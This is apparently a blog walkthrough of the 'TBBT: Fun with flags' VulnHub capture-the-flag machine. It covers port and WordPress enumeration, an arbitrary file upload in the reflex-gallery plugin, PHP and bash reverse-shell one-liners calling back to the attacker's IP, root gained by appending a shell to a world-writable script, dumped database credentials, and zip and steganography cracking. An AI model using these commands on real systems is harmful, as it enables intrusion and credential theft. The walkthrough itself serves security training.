TBBT: Fun with flags Walkthrough

A-s4t0sh
10 min readMar 22, 2020

--

TBBT: Funwithflags
_____ _ _ _ _ _ _____ _
| ___| | | | (_) | | | | ___| |
| |_ _ _ _ __ | | | |_| |_| |__ | |_ | | __ _ __ _ ___
| _| | | | '_ \ | |/\| | | __| '_ \ | _| | |/ _` |/ _` / __|
| | | |_| | | | | \ /\ / | |_| | | | | | | | (_| | (_| \__ \
\_| \__,_|_| |_| \/ \/|_|\__|_| |_| \_| |_|\__,_|\__, |___/
__/ |
|___/

Before putting hands on the machine I read the description of the machine on vulnhub that the machine has DHCP disabled and the IP of the machine is 192.168.1.105 so the first thing I did is, I set my Host Network Manager to IP series 192.168.1.1 and then moved towards enumeration as the IP of the machine is already described in the description.

Port Scanning

┌─[root@NITRO]─[~]
└──╼ #nmap -v -A -p- 192.168.1.105

Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-17 02:06 IST
Nmap scan report for 192.168.1.105
Host is up (0.00032s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 539 Mar 04 00:11 Welcome.txt
| -rw-r--r-- 1 ftp ftp 114 Mar 04 00:13 ftp_agreement.txt
|_drwxr-xr-x 9 ftp ftp 4096 Mar 04 00:09 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.1
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cf:5c:ee:76:7c:48:52:06:8d:56:07:7f:f6:5d:80:f2 (RSA)
| 256 ab:bb:fa:f9:89:99:02:9e:e4:20:fa:37:4f:6f:ca:ca (ECDSA)
|_ 256 ea:6d:77:f3:ff:9c:d5:dd:85:e3:1e:75:3c:7b:66:47 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
| http-robots.txt: 4 disallowed entries
|_/howard /web_shell.php /backdoor /rootflag.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fun with flags!
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :.....

Here as the result is clearly saying that ftp has anonymous login enabled. I moved on ftp and started enumeration inside ftp but its that much helpful I only found few flag and hints that I have no idea of that.

Here in the result of nmap at the last port no. 1337 is saying something clearly so I just had a look at this port using telnet.

┌─[root@NITRO]─[~]
└──╼ #telnet 192.168.1.105 1337

Trying 192.168.1.105...
Connected to 192.168.1.105.
Escape character is '^]'.
FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
Connection closed by foreign host.

Here I found the Sheldon flag at this port as it is also present in the nmap result.

Moving ahead towards the web at “http://192.168.1.105/” what I found is a picture that is of the show “The Big Bang Theory”

http://funwithflags/

Here nothing interesting is available so I moved on to scan for directories that may give some help to go on.

┌─[✗]─[root@NITRO]─[~]
└──╼ #dirb http://192.168.1.105
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Mar 17 02:25:59 2020
URL_BASE: http://192.168.1.105/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------GENERATED WORDS: 4612---- Scanning URL: http://192.168.1.105/ ----
...
==> DIRECTORY: http://192.168.1.105/phpmyadmin/
+ http://192.168.1.105/robots.txt
...
==> DIRECTORY: http://192.168.1.105/music/wordpress/wp-admin/
...

Here I got three interesting things that are the first robots.txt file that has listing of few disallowed paths but I didn’t found them useful at this time.\

WordPress Time

As I also found that WordPress is available on the machine so I just moved on the terminal again and started scanning the WordPress using “wpscan”. I scanned plugins if available and get one which is vulnerable as well as it is out dated.

┌─[root@NITRO]─[~]
└──╼ #wpscan --url http://192.168.1.105/music/wordpress -e p
______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.7.8
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:[+] reflex-gallery
| Location:
http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/
| Last Updated: 2019-05-10T16:05:00.000Z
| [!] The version is out of date, the latest version is 3.1.7
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 3.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| -
http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/readme.txt
[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up
[+] Finished: Tue Mar 17 02:37:06 2020

The plugin “reflex-gallery” is out dated with the version 3.1.3 so without having delay I searched for the exploit for this if any available and I got that but the exploit is a .txt file which gives the necessary detail to exploit the plugin manually.

Reference : https://www.exploit-db.com/exploits/36374

The vulnerability is of Arbitrary File Upload.

Reading the exploit and understanding it is not at all tough. I made a .html file and put the code present in the exploit and opened it with web browser.

file:///root/reflex.html

Here the directory path of the plugin is helpful to upload the shell on the web. After little bit enumeration on the directory of plugin I found php.php file which seems to be interesting as it is saying something.

http://funwithflags/music/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php

Uploading php shell file on the web is easy just select the .php file and click on Pwn! button.

Here make sure to replace the path to the php.php file path in the html file that is “http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php” .

http://funwithflags/music/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php

Here the php shell file get successfully uploaded on the machine and the path where the file got upload is also shown there now its time to call the shell file.

http://funwithflags/music/wordpress/wp-content/uploads/phhp.php

Here I putted a listener on at port no. 1234 and called the shell from web. I used the following command to get the reverse shell :

php -r ‘$sock=fsockopen(“192.168.1.1”,1234);exec(“/bin/bash -i <&3 >&3 2>&3”);’

Now getting the bash shell I moved further :

┌─[root@NITRO]─[~]
└──╼ #nc -nlvp 1234
listening on [any] 1234 …
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.105] 59998
bash: cannot set terminal process group (1153): Inappropriate ioctl for device
bash: no job control in this shell
www-data@tbbt:/var/www/html/music/wordpress/wp-content/uploads$

With further enumeration I got few flags at different locations

www-data@tbbt:/var/ftp/pub/bernadette$ cat PENNY_README_ASAP.txt
cat PENNY_README_ASAP.txt
Penny the IT department from my Pharmaceutical company opened you an account in the B2B website.
You need to go there ASAP and learn our drugs for your interview tomorrow.
I dont remember the link, but it is easy you will find it!
Username: penny69
Password: cant post it here as sheldon said. you know the password. you use it everywhere.
www-data@tbbt:/var/ftp/pub/penny$ cat wifi_password.txt
cat wifi_password.txt
SHELDON DONT CHANGHE IT AGAIN OK!?!?!
THIS IS THE ONLY PASSWORD I CAN REMEMBER
wifipassword: pennyisafreeloader
www-data@tbbt:/home/amy$ strings secretdiary
strings secretdiary
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
__isoc99_scanf
puts
__stack_chk_fail
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.0
PTRh`
UWVS
t$,U
[^_]
Enter your username:
Enter your password:
P@SSw0rd123Sh3ld0n
Login Success!
Soon I will be adding my secrets here..
FLAG-amy{60263777358690b90e8dbe8fea6943c9}
Wrong password! YOY WILL NEVER READ MY SECRETS
User doesn't exist
;*2$"(
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
...
www-data@tbbt:/home/penny$ cat .FLAG.penny.txt
cat .FLAG.penny.txt
RkxBRy1wZW5ueXtkYWNlNTJiZGIyYTBiM2Y4OTlkZmIzNDIzYTk5MmIyNX0=

While enumeration mean while I came to get a interesting file that has all permission and the file is a .sh file in the directory named “leonard”. Getting help from google for Privilege Escalation I got the way to it.

www-data@tbbt:/home/leonard$ ls -la
ls -la
total 24
drwxr-xr-x 2 leonard leonard 4096 Mar 6 00:47 .
drwxr-xr-x 10 root root 4096 Mar 4 02:33 ..
-rw — — — — 1 leonard leonard 0 Mar 6 00:47 .bash_history
-rw-r — r — 1 leonard leonard 220 Sep 1 2015 .bash_logout
-rw-r — r — 1 leonard leonard 3771 Sep 1 2015 .bashrc
-rw-r — r — 1 leonard leonard 655 May 16 2017 .profile
-rwxrwxrwx 1 root root 484 Mar 6 00:23 thermostat_set_temp.sh

I appended a command in the executable .sh file to get the shell

www-data@tbbt:/home/leonard$ echo "bash -i >& /dev/tcp/192.168.1.1/4321 0>&1" >> thermostat_set_temp.sh

In another terminal the listener is on.

┌─[✗]─[root@NITRO]─[~]
└──╼ #nc -nlvp 4321
listening on [any] 4321 …
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.105] 35304
bash: cannot set terminal process group (3409): Inappropriate ioctl for device
bash: no job control in this shell
root@tbbt:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@tbbt:~# whoami
whoami
root
root@tbbt:~#

That looks pretty good. At this point I get root. Now as the description of the VM says there are total 7 Flags with out which the CTF is incomplete. So I again started Enumeration of the flags.

root@tbbt:~# cat FLAG-leonard.txt
cat FLAG-leonard.txt
____
/ \
/______\
||
/~~~~~~~~\ || /~~~~~~~~~~~~~~~~\
/~ () () ~\ || /~ () () () () ~\
(_)========(_) || (_)==== ===========(_)
I|_________|I _||_ |___________________|
.////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Gongrats!
You have rooted the box! Now you can sit on Sheldons spot!
FLAG-leonard{17fc95224b65286941c54747704acd3e}
I hope you liked it!

The another flag found.

root@tbbt:/var/www/html/private# cat db_config.php
cat db_config.php
<?php
// Create connection
$DBUSER = 'bigpharmacorp';
$DBPASS = 'weareevil';
root@tbbt:/var/www/html/music/wordpress# cat wp-config.php
...
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'footprintsonthemoon' );
/** MySQL database username */
define( 'DB_USER', 'footprintsonthemoon' );
/** MySQL database password */
define( 'DB_PASSWORD', 'footprintsonthemoon1337' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
...

After few enumeration I got the credentials of phpmyadmin and mysql database.

root@tbbt:/var/www/html/private# mysql -u bigpharmacorp -p
mysql -u bigpharmacorp -p
Enter password: weareevil
mysql> show databases
show databases
-> ;
;
+--------------------+
| Database |
+--------------------+
| information_schema |
| bigpharmacorp |
+--------------------+
2 rows in set (0.00 sec)
mysql> use bigpharmacorp
use bigpharmacorp
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
show tables;
+-------------------------+
| Tables_in_bigpharmacorp |
+-------------------------+
| products |
| users |
+-------------------------+
2 rows in set (0.00 sec)
mysql> select * from users
select * from users
-> ;
;
+----+------------+----------------------------------+------------+---------------------------------------------------+
| id | username | password | fname | description |
+----+------------+----------------------------------+------------+---------------------------------------------------+
| 1 | admin | 3fc0a7acf087f549ac2b266baf94b8b1 | josh | Dont mess with me |
| 2 | bobby | 8cb1fb4a98b9c43b7ef208d624718778 | bob | I like playing football. |
| 3 | penny69 | cafa13076bb64e7f8bd480060f6b2332 | penny | Hi I am Penny I am new here!! <3 |
| 4 | mitsos1981 | 05d51709b81b7e0f1a9b6b4b8273b217 | dimitris | Opa re malaka! |
| 5 | alicelove | e146ec4ce165061919f887b70f49bf4b | alice | Eat Pray Love |
| 6 | bernadette | dc5ab2b32d9d78045215922409541ed7 | bernadette | FLAG-bernadette{f42d950ab0e966198b66a5c719832d5f} |
+----+------------+----------------------------------+------------+---------------------------------------------------+
6 rows in set (0.00 sec)

One more flag found. Again using the credentials that I found in the wp-config.php file I logged in to the mysql and enumerated the next flag.

FLAG-raz{40d17a74e28a62eac2df19e206f0987c}

Now the one and the last flag that is missing for which I started enumerating form the very first where I came near a file named super_secret_nasa_stuff_here.zip that I already download I tried to unzip it earlier but the file is password protected so for this I googled the way to brute-force it any how and I got the tool to do so.

┌─[root@NITRO]─[~]
└──╼ #fcrackzip -D -p /usr/share/wordlists/rockyou.txt super_secret_nasa_stuff_here.zip -u
PASSWORD FOUND!!!!: pw == astronaut
┌─[✗]─[root@NITRO]─[~]
└──╼ #unzip super_secret_nasa_stuff_here.zip
Archive: super_secret_nasa_stuff_here.zip
[super_secret_nasa_stuff_here.zip] marsroversketch.jpg password:
inflating: marsroversketch.jpg
┌─[✗]─[root@NITRO]─[~]
└──╼ #stegcracker marsroversketch.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.0.7 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2020 - Luke Paris (Paradoxis)Counting lines in wordlist..
Attacking file 'marsroversketch.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: iloveyoumom
Tried 51221 passwords
Your file has been written to: marsroversketch.jpg.out
iloveyoumom
┌─[✗]─[root@NITRO]─[~]
└──╼ # file marsroversketch.jpg.out
marsroversketch.jpg.out: ASCII text
┌─[✗]─[root@NITRO]─[~]
└──╼ # cat marsroversketch.jpg.out
FLAG-howard{b3d1baf22e07874bf744ad7947519bf4}

Here I got all 7 flags as well as root of the machine. Well as the machine name saying “Fun with flags”, there is too much fun in finding the flags. I came around few new concepts mean while solving and fining the flags and clear that concepts too.

--

--

No responses yet